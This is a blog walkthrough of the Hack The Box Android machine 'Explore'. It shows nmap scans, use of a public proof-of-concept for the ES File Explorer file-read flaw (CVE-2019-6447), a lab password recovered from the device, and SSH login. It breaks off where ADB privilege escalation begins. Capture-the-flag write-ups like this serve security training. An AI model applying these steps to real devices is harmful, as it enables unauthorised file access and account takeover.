Walk-through for android machine called from Hackthebox called Explore
In this blog post we will take a look at an android machine from Hackthebox called Explore.
Executive Summary
Initial Exploitation
The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP
Privilege Escalation
It was observed that the internal port 5555 was running Android Debug Bridge(ADB) service. With the help of port forwarding it gave us a shell which was in sudo group resulting in the successful root shell
Enumeration
Performing Nmap scans on the device
Nmap Service Scan
Detailed scan result for the open ports in the machine
root@kali ~/h/explore# nmap -p 2222,5555,43815,59777 -sC -sV 10.10.10.247
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-27 06:46 EDT
Nmap scan report for 10.10.10.247
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
43815/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:02 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Mon, 27 Jun 2022 10:47:02 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Mon, 27 Jun 2022 10:47:07 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:23 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:07 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:23 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:23 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:23 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Nmap Full Port Scan
Performing a full port TCP scan on all the available ports
root@kali ~/h/explore# nmap -p- --min-rate 10000 10.10.10.247
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-27 06:45 EDT
Nmap scan report for 10.10.10.247
Host is up (0.12s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
5555/tcp filtered freeciv
43815/tcp open unknown
59777/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
The final scan show only 4 port opened.
Port 59777
After extensive research we discovered that the port 59777 usually runs a service called 'ES File Explorer' which has a lot of vulnerabilities
Initial Exploitation
ES File Explorer 4.1.9.7.4 - Arbitrary File Read
The ES File Explorer has a famous arbitrary file read vulnerability known as CVE-2019-6447.
Given the vulnerability there is a git repo with the proper exploit
Running the 'list' to check the available commands
root@kali ~/h/e/ESFileExplorerOpenPortVuln (master)# python poc.py list
######################
# Available Commands #
######################
listFiles: List all the files
listPics: List all the pictures
listVideos: List all the videos
listAudios: List all the audio files
listApps: List all the apps installed
listAppsSystem: List all the system apps
listAppsPhone: List all the phone apps
listAppsSdcard: List all the apk files in the sdcard
listAppsAll: List all the apps installed (system apps included)
getDeviceInfo: Get device info. Package name parameter is needed
appPull: Pull an app from the device
appLaunch: Launch an app. Package name parameter is needed
getAppThumbnail: Get the icon of an app. Package name parameter is needed
This gave us a lot of options to list various utilities. Listing all the images
We have credentials for username Kristi and an open SSH port
SSH Access
From the nmap scan, there is an open SSH port 2222
Username: Kristi
Password: Kr1sT!5h@Rp3xPl0r3!
With the credentials we have we can login via SSH
root@kali ~/h/explore# ssh -oHostKeyAlgorithms=+ssh-rsa kristi@10.10.10.247 -p 2222
The authenticity of host '[10.10.10.247]:2222 ([10.10.10.247]:2222)' can't be established.
RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.247]:2222' (RSA) to the list of known hosts.
Password authentication
(kristi@10.10.10.247) Password:
:/ $ whoami
u0_a76
We got initial entry shell access as user u0_a76
Privilege Escalation
ADB Exploitation
There is an internal port 5555 running inside the machine